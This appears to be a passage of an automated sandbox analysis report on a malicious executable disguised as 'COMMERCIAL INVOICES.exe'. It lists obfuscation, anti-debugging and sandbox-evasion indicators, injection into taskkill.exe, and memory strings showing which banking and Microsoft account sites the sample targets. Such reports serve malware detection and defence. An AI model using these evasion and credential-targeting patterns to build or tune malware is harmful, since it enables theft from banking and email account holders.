            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, q598vXWMJVqmSJ4TcV.cs | High entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, U4MZBR8NwmLOtx27mp.cs | High entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, XYbpMIyCGhf593orlY.cs | High entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, e9ABKXtgEBCcdDS8fM.cs | High entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, HdBXwX4EpLlOYfjryw.cs | High entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, vVQ4gmc6IjLKXDHf3D.cs | High entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, bZLr5dIHP2nUPnA0nI.cs | High entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, hCECRwYOSLpQCB6qx8.cs | High entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, DP8bVlHOj0ljQyuNZ6.cs | High entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, mfFkuJ5rWwRdGwBJMS.cs | High entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, YLPLgdjdRFYqApV2un.cs | High entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: COMMERCIAL INVOICES.exe PID: 4144, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\taskkill.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: 29B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: 2CA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: 29B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: 8E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: 9E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: A000000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Memory allocated: B000000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0128096E rdtsc 4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\taskkill.exe Window / User API: threadDelayed 829
            Source: C:\Windows\SysWOW64\taskkill.exe Window / User API: threadDelayed 9143
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\taskkill.exe API coverage: 2.4 %
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe TID: 3056 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060 Thread sleep count: 829 > 30
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060 Thread sleep time: -1658000s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060 Thread sleep count: 9143 > 30
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060 Thread sleep time: -18286000s >= -30000s
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe TID: 1292 Thread sleep time: -45000s >= -30000s
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe TID: 1292 Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\taskkill.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_0086C3E0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0086C3E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Thread delayed: delay time: 922337203685477
            Source: oKWoZthfkV.exe, 00000009.00000002.3899214281.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: 2636-l0.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 2636-l0.6.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 2636-l0.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2636-l0.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}&[
            Source: 2636-l0.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2636-l0.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2636-l0.6.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2636-l0.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 0000000A.00000002.2830130750.000001B34A1BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2636-l0.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 2636-l0.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2636-l0.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2636-l0.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2636-l0.6.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2636-l0.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 2636-l0.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 2636-l0.6.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2636-l0.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2636-l0.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\taskkill.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0128096E rdtsc 4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_00417413 LdrLoadDll, 4_2_00417413
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01270124 mov eax, dword ptr fs:[00000030h] 4_2_01270124
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h] 4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01300115 mov eax, dword ptr fs:[00000030h] 4_2_01300115
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EA118 mov ecx, dword ptr fs:[00000030h] 4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EA118 mov eax, dword ptr fs:[00000030h] 4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01314164 mov eax, dword ptr fs:[00000030h] 4_2_01314164
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h] 4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D4144 mov ecx, dword ptr fs:[00000030h] 4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h] 4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01246154 mov eax, dword ptr fs:[00000030h] 4_2_01246154
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123C156 mov eax, dword ptr fs:[00000030h] 4_2_0123C156
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D8158 mov eax, dword ptr fs:[00000030h] 4_2_012D8158
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012FC188 mov eax, dword ptr fs:[00000030h] 4_2_012FC188
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01280185 mov eax, dword ptr fs:[00000030h] 4_2_01280185
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012E4180 mov eax, dword ptr fs:[00000030h] 4_2_012E4180
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C019F mov eax, dword ptr fs:[00000030h] 4_2_012C019F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123A197 mov eax, dword ptr fs:[00000030h] 4_2_0123A197
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_013161E5 mov eax, dword ptr fs:[00000030h] 4_2_013161E5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012701F8 mov eax, dword ptr fs:[00000030h] 4_2_012701F8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_013061C3 mov eax, dword ptr fs:[00000030h] 4_2_013061C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012BE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h] 4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123A020 mov eax, dword ptr fs:[00000030h] 4_2_0123A020
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123C020 mov eax, dword ptr fs:[00000030h] 4_2_0123C020
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D6030 mov eax, dword ptr fs:[00000030h] 4_2_012D6030
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C4000 mov ecx, dword ptr fs:[00000030h] 4_2_012C4000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012E2000 mov eax, dword ptr fs:[00000030h] 4_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0125E016 mov eax, dword ptr fs:[00000030h] 4_2_0125E016
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0126C073 mov eax, dword ptr fs:[00000030h] 4_2_0126C073
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01242050 mov eax, dword ptr fs:[00000030h] 4_2_01242050
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C6050 mov eax, dword ptr fs:[00000030h] 4_2_012C6050
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012380A0 mov eax, dword ptr fs:[00000030h] 4_2_012380A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012D80A8 mov eax, dword ptr fs:[00000030h] 4_2_012D80A8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_013060B8 mov eax, dword ptr fs:[00000030h] 4_2_013060B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_013060B8 mov ecx, dword ptr fs:[00000030h] 4_2_013060B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0124208A mov eax, dword ptr fs:[00000030h] 4_2_0124208A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0123A0E3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C60E0 mov eax, dword ptr fs:[00000030h] 4_2_012C60E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012480E9 mov eax, dword ptr fs:[00000030h] 4_2_012480E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0123C0F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012820F0 mov ecx, dword ptr fs:[00000030h] 4_2_012820F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C20DE mov eax, dword ptr fs:[00000030h] 4_2_012C20DE
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01318324 mov eax, dword ptr fs:[00000030h] 4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01318324 mov ecx, dword ptr fs:[00000030h] 4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01318324 mov eax, dword ptr fs:[00000030h] 4_2_01318324
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0127A30B mov eax, dword ptr fs:[00000030h] 4_2_0127A30B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123C310 mov ecx, dword ptr fs:[00000030h] 4_2_0123C310
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01260310 mov ecx, dword ptr fs:[00000030h] 4_2_01260310
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012E437C mov eax, dword ptr fs:[00000030h] 4_2_012E437C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0130A352 mov eax, dword ptr fs:[00000030h] 4_2_0130A352
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C2349 mov eax, dword ptr fs:[00000030h] 4_2_012C2349
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C035C mov eax, dword ptr fs:[00000030h] 4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C035C mov ecx, dword ptr fs:[00000030h] 4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C035C mov eax, dword ptr fs:[00000030h] 4_2_012C035C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012E8350 mov ecx, dword ptr fs:[00000030h] 4_2_012E8350
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0131634F mov eax, dword ptr fs:[00000030h] 4_2_0131634F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0126438F mov eax, dword ptr fs:[00000030h] 4_2_0126438F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123E388 mov eax, dword ptr fs:[00000030h] 4_2_0123E388
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01238397 mov eax, dword ptr fs:[00000030h] 4_2_01238397
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012503E9 mov eax, dword ptr fs:[00000030h] 4_2_012503E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0125E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012763FF mov eax, dword ptr fs:[00000030h] 4_2_012763FF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012FC3CD mov eax, dword ptr fs:[00000030h] 4_2_012FC3CD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0124A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0124A3C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012483C0 mov eax, dword ptr fs:[00000030h] 4_2_012483C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C63C0 mov eax, dword ptr fs:[00000030h] 4_2_012C63C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE3DB mov eax, dword ptr fs:[00000030h] 4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE3DB mov ecx, dword ptr fs:[00000030h] 4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012EE3DB mov eax, dword ptr fs:[00000030h] 4_2_012EE3DB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012E43D4 mov eax, dword ptr fs:[00000030h] 4_2_012E43D4
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123823B mov eax, dword ptr fs:[00000030h] 4_2_0123823B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01244260 mov eax, dword ptr fs:[00000030h] 4_2_01244260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123826B mov eax, dword ptr fs:[00000030h] 4_2_0123826B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012F0274 mov eax, dword ptr fs:[00000030h] 4_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0131625D mov eax, dword ptr fs:[00000030h] 4_2_0131625D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C8243 mov eax, dword ptr fs:[00000030h] 4_2_012C8243
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012C8243 mov ecx, dword ptr fs:[00000030h] 4_2_012C8243
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_0123A250 mov eax, dword ptr fs:[00000030h] 4_2_0123A250
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_01246259 mov eax, dword ptr fs:[00000030h] 4_2_01246259
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012FA250 mov eax, dword ptr fs:[00000030h] 4_2_012FA250
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe Code function: 4_2_012502A0 mov eax, dword ptr fs:[00000030h] 4_2_012502A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov ecx, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D62A0 mov eax, dword ptr fs:[00000030h]4_2_012D62A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E284 mov eax, dword ptr fs:[00000030h]4_2_0127E284
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E284 mov eax, dword ptr fs:[00000030h]4_2_0127E284
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0283 mov eax, dword ptr fs:[00000030h]4_2_012C0283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012502E1 mov eax, dword ptr fs:[00000030h]4_2_012502E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A2C3 mov eax, dword ptr fs:[00000030h]4_2_0124A2C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013162D6 mov eax, dword ptr fs:[00000030h]4_2_013162D6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250535 mov eax, dword ptr fs:[00000030h]4_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E53E mov eax, dword ptr fs:[00000030h]4_2_0126E53E
